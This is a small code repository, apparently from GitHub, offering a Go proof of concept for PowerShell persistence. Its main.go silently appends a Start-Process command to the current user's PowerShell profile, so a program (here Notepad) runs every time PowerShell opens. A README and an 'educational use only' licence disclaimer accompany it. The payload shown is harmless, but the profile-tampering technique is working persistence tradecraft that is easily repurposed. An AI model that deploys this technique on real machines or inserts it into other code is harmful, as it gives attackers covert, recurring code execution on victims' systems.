├── LICENSE ├── README.md └── main.go /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 EvilBytecode 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to use the Software for educational and authorized cybersecurity research purposes only, subject to the following conditions: 7 | 8 | The above copyright notice, this permission notice, and the following disclaimer shall be included in all copies or substantial portions of the Software. 9 | 10 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 11 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS (INCLUDING EvilBytecode) BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, 12 | WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE, COPYING, DOWNLOADING, OR OTHER DEALINGS IN THE SOFTWARE. 13 | 14 | DISCLAIMER: I, EvilBytecode, release this project strictly for educational, academic, and authorized cybersecurity research purposes. 15 | By accessing, downloading, copying, using, or modifying this software, you agree to these terms. 16 | You must obtain explicit written permission from system owners before conducting any testing using this software. 17 | Unauthorized use, distribution, or deployment of this software against any third party, device, network, or system without prior consent is strictly forbidden and illegal. 18 | I, EvilBytecode, disclaim all responsibility, liability, or consequences arising from any misuse, illegal activities, damages, or losses resulting from this software. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Powershell-Persistance (PoC) 2 | 3 | 4 | - Whenever PowerShell is launched, Notepad will also open. You can customize the script for educational purposes, but I emphasize that I do not take any responsibility for its use or any actions taken. 5 | 6 | ## Credits? 7 | - me / codepulze / evilbytecode 8 | 9 | ## Licensed under MIT. 10 | 11 | ## Showcase: 12 | 13 | 14 | https://github.com/EvilBytecode/Powershell-Persistance/assets/151552809/09488980-215c-41f1-ba1d-8e5e34188f53 15 | 16 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "path/filepath" 6 | ) 7 | 8 | func main() { 9 | up, _ := os.UserHomeDir() 10 | psprofpath := filepath.Join(up, "Documents", "WindowsPowerShell", "Microsoft.PowerShell_profile.ps1") 11 | os.MkdirAll(filepath.Dir(psprofpath), os.ModePerm) 12 | file, _ := os.OpenFile(psprofpath, os.O_APPEND|os.O_WRONLY|os.O_CREATE, os.ModePerm) 13 | defer file.Close() 14 | file.WriteString(`Start-Process "C:\Windows\System32\notepad.exe"` + "\n") 15 | } 16 | --------------------------------------------------------------------------------